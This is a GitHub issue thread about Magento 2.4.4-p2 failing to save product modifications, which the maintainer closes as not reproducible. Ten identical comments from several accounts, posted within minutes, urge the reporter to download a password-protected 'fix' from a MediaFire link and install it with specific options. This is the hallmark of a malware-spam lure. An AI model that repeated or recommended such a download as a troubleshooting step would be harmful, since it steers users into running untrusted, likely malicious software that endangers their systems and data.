### ISSUE TITLE
MODIFICATION CANNOT BE SAVED

### ISSUE THREAD

**Issue by Fluidhub** [magento/magento2#39115] opened 2024-08-27 07:41 UTC
### Preconditions and environment

- Magento version 2.4.4-p2
- Anything else that would help a developer reproduce the bug

### Steps to reproduce

See attached video
[Video problema salvataggi Magento.zip](https://github.com/user-attachments/files/16758407/Video.problema.salvataggi.Magento.zip)

### Expected result

Be able to save modification

### Actual result

Modification cannot be saved

### Triage and priority

- [ ] Severity: **S0** _- Affects critical data or functionality and leaves users without workaround._
- [ ] Severity: **S1** _- Affects critical data or functionality and forces users to employ a workaround._
- [ ] Severity: **S2** _- Affects non-critical data or functionality and forces users to employ a workaround._
- [ ] Severity: **S3** _- Affects non-critical data or functionality and does not force users to employ a workaround._
- [ ] Severity: **S4** _- Affects aesthetics, professional look and feel, “quality” or “usability”._

**Comment by MirsonMboa** [comment] 2024-08-27 07:41
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment] 2024-08-27 07:41
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FoioMikael** [comment] 2024-08-27 07:41
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ESMELSTEPHANE24** [comment] 2024-08-27 07:41
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment] 2024-08-27 07:42
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FoioMikael** [comment] 2024-08-27 07:42
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment] 2024-08-27 07:42
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment] 2024-08-27 07:42
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment] 2024-08-27 07:42
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FoioMikael** [comment] 2024-08-27 07:43
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by engcom-Bravo** [comment] 2024-08-28 05:35
@magento give me 2.4-develop instance

**Comment by engcom-Bravo** [comment] 2024-08-28 06:22
Hi @Fluidhub,

Thanks for your reporting and collaboration.

We have verified the issue in Latest 2.4-develop instance and the issue is not reproducible.Kindly refer the attached video.


https://github.com/user-attachments/assets/52cd050f-e2bf-4038-8eef-7b02af015da8


We are able to modify the product successfully.

Kindly recheck the issue in Latest 2.4-develop instance and elaborate the steps if the issue is still reproducible and check if any third party modules causing the issue.

Thanks.

**Comment by engcom-Bravo** [comment] 2024-09-09 06:14
Hi @Fluidhub,


We have noticed that this issue has not been updated since long time. Hence we assume that this issue is fixed now, so we are closing it. Please feel to raise a fresh ticket or reopen this ticket if you need more assistance on this.

Thanks.

**Closed as completed by engcom-Bravo** 2024-09-09 06:14 UTC
Labels: Issue: needs update, Reported on 2.4.4-p2
